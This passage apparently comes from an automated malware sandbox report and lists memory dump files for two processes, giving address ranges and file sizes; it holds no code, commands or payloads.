                                                    • memory/2332-419-0x00007FFB47520000-0x00007FFB47A53000-memory.dmp

                                                      Filesize

                                                      5.2MB

                                                    • memory/2332-418-0x00007FFB47400000-0x00007FFB4751A000-memory.dmp

                                                      Filesize

                                                      1.1MB

                                                    • memory/2332-417-0x00007FFB57D50000-0x00007FFB57D5D000-memory.dmp

                                                      Filesize

                                                      52KB

                                                    • memory/2332-416-0x00007FFB57B50000-0x00007FFB57B64000-memory.dmp

                                                      Filesize

                                                      80KB

                                                    • memory/2332-414-0x00007FFB57700000-0x00007FFB577CE000-memory.dmp

                                                      Filesize

                                                      824KB

                                                    • memory/2332-31-0x00007FFB5C4F0000-0x00007FFB5C515000-memory.dmp

                                                      Filesize

                                                      148KB

                                                    • memory/3856-96-0x0000025B6F460000-0x0000025B6F482000-memory.dmp

                                                      Filesize

                                                      136KB